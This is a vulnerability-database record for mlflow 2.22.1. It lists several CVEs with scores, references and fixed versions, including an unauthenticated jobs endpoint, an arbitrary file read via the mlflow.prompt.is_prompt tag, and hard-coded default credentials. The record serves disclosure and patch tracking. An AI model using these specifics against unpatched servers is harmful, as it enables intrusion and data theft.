Look up vulnerable packages by Package URL (purl).

Purl pkg:pypi/mlflow@2.22.1
Type pypi
Namespace
Name mlflow
Version 2.22.1
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version 3.11.0
Latest_non_vulnerable_version 3.11.1
Affected_by_vulnerabilities
0
url VCID-1bya-32tr-jfhz
vulnerability_id VCID-1bya-32tr-jfhz
summary A flaw has been found in MLflow up to 3.10.0. This issue affects the function mlflow.data.digest_utils of the file mlflow/data/digest_utils.py of the component Dataset Digest Computation. This manipulation causes use of weak hash. It is possible to launch the attack on the local host. The attack is considered to have high complexity. The exploitability is assessed as difficult. The exploit has been published and may be used. The project was informed of the problem early through a pull request but has not reacted yet.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-10803.json
reference_id
reference_type
scores
0
value 2.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-10803.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-10803
reference_id
reference_type
scores
0
value 6e-05
scoring_system epss
scoring_elements 0.0044
published_at 2026-06-14T12:55:00Z
1
value 6e-05
scoring_system epss
scoring_elements 0.00431
published_at 2026-06-13T12:55:00Z
2
value 6e-05
scoring_system epss
scoring_elements 0.00432
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-10803
2
reference_url https://github.com/mlflow/mlflow/issues/22419
reference_id 22419
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://github.com/mlflow/mlflow/issues/22419
3
reference_url https://github.com/mlflow/mlflow/pull/22420
reference_id 22420
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://github.com/mlflow/mlflow/pull/22420
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2484755
reference_id 2484755
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2484755
5
reference_url https://vuldb.com/vuln/368252
reference_id 368252
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://vuldb.com/vuln/368252
6
reference_url https://vuldb.com/submit/831462
reference_id 831462
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://vuldb.com/submit/831462
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:mlflow:mlflow:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:mlflow:mlflow:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:mlflow:mlflow:*:*:*:*:*:*:*:*
8
reference_url https://vuldb.com/vuln/368252/cti
reference_id cti
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://vuldb.com/vuln/368252/cti
9
reference_url https://vuldb.com/cve/CVE-2026-10803
reference_id CVE-2026-10803
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://vuldb.com/cve/CVE-2026-10803
10
reference_url https://github.com/mlflow/mlflow/
reference_id mlflow
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://github.com/mlflow/mlflow/
fixed_packages
0
url pkg:pypi/mlflow@3.10.1
purl pkg:pypi/mlflow@3.10.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-24ct-fu3q-gbgj
1
vulnerability VCID-fxtg-yezw-hfhr
2
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.10.1
aliases BIT-mlflow-2026-10803, CVE-2026-10803, PYSEC-2026-195
risk_score 1.6
exploitability 0.5
weighted_severity 3.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1bya-32tr-jfhz
1
url VCID-24ct-fu3q-gbgj
vulnerability_id VCID-24ct-fu3q-gbgj
summary In mlflow/mlflow, the FastAPI job endpoints under `/ajax-api/3.0/jobs/*` are not protected by authentication or authorization when the `basic-auth` app is enabled. This vulnerability affects the latest version of the repository. If job execution is enabled (`MLFLOW_SERVER_ENABLE_JOB_EXECUTION=true`) and any job function is allowlisted, any network client can submit, read, search, and cancel jobs without credentials, bypassing basic-auth entirely. This can lead to unauthenticated remote code execution if allowed jobs perform privileged actions such as shell execution or filesystem changes. Even if jobs are deemed safe, this still constitutes an authentication bypass, potentially resulting in job spam, denial of service (DoS), or data exposure in job results.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-0545.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-0545.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-0545
reference_id
reference_type
scores
0
value 0.11241
scoring_system epss
scoring_elements 0.93709
published_at 2026-06-14T12:55:00Z
1
value 0.11241
scoring_system epss
scoring_elements 0.93683
published_at 2026-06-11T12:55:00Z
2
value 0.11241
scoring_system epss
scoring_elements 0.93707
published_at 2026-06-13T12:55:00Z
3
value 0.11241
scoring_system epss
scoring_elements 0.93703
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-0545
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-0545
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-0545
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2454889
reference_id 2454889
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2454889
5
reference_url https://huntr.com/bounties/b2e5b028-9541-4d29-8703-a76f1a3734d8
reference_id b2e5b028-9541-4d29-8703-a76f1a3734d8
reference_type
scores
0
value 9.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-03T17:48:47Z/
url https://huntr.com/bounties/b2e5b028-9541-4d29-8703-a76f1a3734d8
6
reference_url https://github.com/advisories/GHSA-7qhf-v65m-g5f3
reference_id GHSA-7qhf-v65m-g5f3
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7qhf-v65m-g5f3
fixed_packages
0
url pkg:pypi/mlflow@3.11.0rc0
purl pkg:pypi/mlflow@3.11.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-fxtg-yezw-hfhr
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.11.0rc0
aliases CVE-2026-0545, GHSA-7qhf-v65m-g5f3
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-24ct-fu3q-gbgj
2
url VCID-4jqc-vp49-2ybf
vulnerability_id VCID-4jqc-vp49-2ybf
summary A vulnerability in the `_create_model_version()` handler of `mlflow/server/handlers.py` in mlflow/mlflow versions 3.9.0 and earlier allows an unauthenticated remote attacker to read arbitrary files from the server's filesystem. The issue arises when a `CreateModelVersion` request includes the tag `mlflow.prompt.is_prompt`, which bypasses source path validation. This enables an attacker to store an arbitrary local filesystem path as the model version source. The `get_model_version_artifact_handler()` function later uses this source to serve files without verifying the model version's prompt status, leading to a complete confidentiality compromise. This issue is fixed in version 3.10.0.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2614.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2614.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-2614
reference_id
reference_type
scores
0
value 0.0005
scoring_system epss
scoring_elements 0.16113
published_at 2026-06-11T12:55:00Z
1
value 0.00055
scoring_system epss
scoring_elements 0.17684
published_at 2026-06-12T12:55:00Z
2
value 0.00055
scoring_system epss
scoring_elements 0.17701
published_at 2026-06-13T12:55:00Z
3
value 0.00055
scoring_system epss
scoring_elements 0.17676
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-2614
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-2614
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-2614
4
reference_url https://huntr.com/bounties/19380271-3fbf-4beb-987e-6fd7069c55e6
reference_id 19380271-3fbf-4beb-987e-6fd7069c55e6
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:32:48Z/
url https://huntr.com/bounties/19380271-3fbf-4beb-987e-6fd7069c55e6
5
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2469309
reference_id 2469309
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2469309
6
reference_url https://github.com/mlflow/mlflow/commit/6e801f4259d96804c73107315b24cef0f6aa115a
reference_id 6e801f4259d96804c73107315b24cef0f6aa115a
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:32:48Z/
url https://github.com/mlflow/mlflow/commit/6e801f4259d96804c73107315b24cef0f6aa115a
7
reference_url https://github.com/advisories/GHSA-42h5-h8qh-vv9v
reference_id GHSA-42h5-h8qh-vv9v
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-42h5-h8qh-vv9v
fixed_packages
0
url pkg:pypi/mlflow@3.10.0
purl pkg:pypi/mlflow@3.10.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-fxtg-yezw-hfhr
3
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.10.0
aliases CVE-2026-2614, GHSA-42h5-h8qh-vv9v
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4jqc-vp49-2ybf
3
url VCID-4jya-uh8s-4ycv
vulnerability_id VCID-4jya-uh8s-4ycv
summary
MLflow Use of Default Password Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of MLflow. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the basic_auth.ini file. The file contains hard-coded default credentials. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of the administrator. Was ZDI-CAN-28256.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2635.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2635.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-2635
reference_id
reference_type
scores
0
value 0.01519
scoring_system epss
scoring_elements 0.81642
published_at 2026-06-11T12:55:00Z
1
value 0.01519
scoring_system epss
scoring_elements 0.81703
published_at 2026-06-14T12:55:00Z
2
value 0.01519
scoring_system epss
scoring_elements 0.81711
published_at 2026-06-13T12:55:00Z
3
value 0.01519
scoring_system epss
scoring_elements 0.81702
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-2635
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/commit/5bf2ec2bd4222a18d78631183ac7f6b752afe8a4
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/5bf2ec2bd4222a18d78631183ac7f6b752afe8a4
4
reference_url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
5
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-111
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.zerodayinitiative.com/advisories/ZDI-26-111
6
reference_url https://github.com/mlflow/mlflow/pull/19260
reference_id 19260
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-24T15:17:25Z/
url https://github.com/mlflow/mlflow/pull/19260
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2441514
reference_id 2441514
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2441514
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-2635
reference_id CVE-2026-2635
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-2635
9
reference_url https://github.com/advisories/GHSA-gq3w-7jj3-x7gr
reference_id GHSA-gq3w-7jj3-x7gr
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gq3w-7jj3-x7gr
10
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-111/
reference_id ZDI-26-111
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-24T15:17:25Z/
url https://www.zerodayinitiative.com/advisories/ZDI-26-111/
fixed_packages
0
url pkg:pypi/mlflow@3.8.0rc0
purl pkg:pypi/mlflow@3.8.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-9mak-nkua-3uhr
5
vulnerability VCID-axte-ftrh-4bb7
6
vulnerability VCID-fxtg-yezw-hfhr
7
vulnerability VCID-kqsy-qu8j-8ugj
8
vulnerability VCID-scm3-63j1-tkf2
9
vulnerability VCID-wphf-gk61-8ube
10
vulnerability VCID-xdur-8vs8-jfcy
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.8.0rc0
aliases CVE-2026-2635, GHSA-gq3w-7jj3-x7gr
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4jya-uh8s-4ycv
4
url VCID-7ykf-b93e-w7am
vulnerability_id VCID-7ykf-b93e-w7am
summary MLFlow versions up to and including 3.4.0 are vulnerable to DNS rebinding attacks due to a lack of Origin header validation in the MLFlow REST server. This vulnerability allows malicious websites to bypass Same-Origin Policy protections and execute unauthorized calls against REST endpoints. An attacker can query, update, and delete experiments via the affected endpoints, leading to potential data exfiltration, destruction, or manipulation. The issue is resolved in version 3.5.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-14279
reference_id
reference_type
scores
0
value 0.0002
scoring_system epss
scoring_elements 0.05807
published_at 2026-06-12T12:55:00Z
1
value 0.0002
scoring_system epss
scoring_elements 0.05788
published_at 2026-06-14T12:55:00Z
2
value 0.0002
scoring_system epss
scoring_elements 0.05785
published_at 2026-06-11T12:55:00Z
3
value 0.0002
scoring_system epss
scoring_elements 0.05798
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-14279
1
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
2
reference_url https://github.com/mlflow/mlflow/pull/17910
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/pull/17910
3
reference_url https://github.com/mlflow/mlflow/commit/b0ffd289e9b0d0cc32c9e3a9b9f3843ae83dbec3
reference_id b0ffd289e9b0d0cc32c9e3a9b9f3843ae83dbec3
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-12T14:54:23Z/
url https://github.com/mlflow/mlflow/commit/b0ffd289e9b0d0cc32c9e3a9b9f3843ae83dbec3
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-14279
reference_id CVE-2025-14279
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-14279
5
reference_url https://huntr.com/bounties/ef478f72-2e4f-44dc-8055-fc06bef03108
reference_id ef478f72-2e4f-44dc-8055-fc06bef03108
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-12T14:54:23Z/
url https://huntr.com/bounties/ef478f72-2e4f-44dc-8055-fc06bef03108
6
reference_url https://github.com/advisories/GHSA-pgqp-8h46-6x4j
reference_id GHSA-pgqp-8h46-6x4j
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-pgqp-8h46-6x4j
fixed_packages
0
url pkg:pypi/mlflow@3.5.0
purl pkg:pypi/mlflow@3.5.0
is_vulnerable true
affected_by_vulnerabilities
0
